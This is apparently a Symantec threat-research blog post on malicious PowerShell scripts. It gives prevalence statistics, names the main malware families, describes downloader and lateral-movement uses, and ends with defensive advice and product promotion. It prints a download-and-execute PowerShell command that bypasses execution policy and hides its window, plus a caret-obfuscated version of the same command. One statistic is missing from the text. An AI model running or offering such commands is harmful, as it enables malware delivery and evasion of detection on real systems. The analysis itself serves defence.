Malicious PowerShell scripts are on the rise, as attackers are using the framework’s flexibility to download their payloads, traverse through a compromised network, and carry out reconnaissance. Symantec analyzed PowerShell malware samples to find out how much of a danger they posed.
Of all of the PowerShell scripts analyzed through the BlueCoat Malware Analysis sandbox, 95.4 percent were malicious. This shows that externally sourced PowerShell scripts are a major threat to enterprises.
PowerShell – a language for everyone
Microsoft PowerShell is a powerful scripting language and shell framework primarily used on Windows computers. It has been around for more than 10 years and will replace the default command prompt on Windows in the future. While many system administrators use PowerShell scripts for daily management tasks, we have seen attackers increasingly using the framework for their campaigns.
Many recent targeted attacks have used PowerShell scripts. For example, the Odinaff group used malicious PowerShell scripts when it attacked financial organizations worldwide. Common cybercriminals are leveraging PowerShell as well, such as the attackers behind Trojan.Kotver, who use the scripting language to create a fileless infection completely contained in the registry.
PowerShell is installed by default on most Windows computers, and most organizations do not have extended logging enabled for the framework. These two factors make PowerShell a favored attack tool. Furthermore, scripts can easily be obfuscated and allow for payloads to be executed directly from memory.
Malicious PowerShell occurrences
We have predominantly seen malicious PowerShell scripts used as downloaders, such as Office macros, and during the lateral movement phase, where a threat executes code on a remote computer when spreading inside the network.
The most prevalent malware families that currently use PowerShell are:
- W97M.Downloader (9.4 percent of all analyzed samples)
- Trojan.Kotver (4.5 percent)
- JS.Downloader ( percent)
These three threats have been distributed in spam emails.
Some of the newest downloader attacks using PowerShell work through multiple stages, where the attached script downloads another script, which in turn downloads the payload. Attackers use this convoluted infection method in an attempt to bypass security protections.
Apart from downloading payloads, malicious PowerShell scripts have been used to perform various tasks such as uninstalling security products, detecting sandboxed environments, or sniffing the network for passwords.
Disguising malicious scripts
The flexibility of the PowerShell language allows scripts to be obfuscated in multiple ways, such as command shortcuts, escape characters, or encoding functions.
For example, the following is a simple script that downloads and executes a remote file:
cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile(‘http://[REMOVED]’,’%userappdata%.exe’);start-process %userappdata%.exe
We have seen attackers use basic obfuscation to transform the same command into the following:
cmd.exe /c ping Local^hos^T & poWerSheLL.exe -eXecutio^nPOlIcy ByPasS^ -n^op^rO^fi -w 1 (n^ew^-^OB^Ject^ ne^t.we^Bcl^i^ent^)^.^do^wnlo^adf^Ile(^’http://[REMOVED]’,’%USERAPPDATA%.eXe’);^S^tart-^PR^O^ce^SS^ %USERAPPDATA%.eXe
However, out of the 111 analyzed threat families that use PowerShell, only eight percent used any obfuscation such as mixed-case letters. None of the analyzed threats randomized the order of the command arguments. The most commonly used PowerShell command-line argument was “NoProfile” (34 percent), followed by “WindowStyle” (24 percent), and “ExecutionPolicy” (23 percent).
Symantec expects more PowerShell threats to appear in the future. We strongly recommend system administrators to upgrade to the latest version of PowerShell and enable extended logging and monitoring capabilities.
Symantec and Norton customers are protected against PowerShell threats through our multilayered security approach:
- Antivirus and Intrusion Prevention System (IPS) detections are in place for each of the discussed threat families
- Behavior-based detection blocks suspicious processes using the SONAR series of detections
- Email-filtering services such as Symantec Email Security.cloud can block emails associated with these attacks before they can reach users
- Symantec Messaging Gateway’s Disarm technology can also protect computers from many email-borne attacks by removing the malicious content from the attached documents before they even reach the user
- Bluecoat Malware Analysis sandbox uses a powerful dual-detection approach that combines virtualization and emulation to detect malicious behavior.
- Symantec’s Advanced Threat Protection solution allows customers to uncover attacks that would otherwise evade detection
- Symantec’s Cyber Security Services can help organizations achieve a higher level of security with our leading cyber threat experts for global threat and adversary intelligence, advanced threat monitoring, cyber readiness, and incident response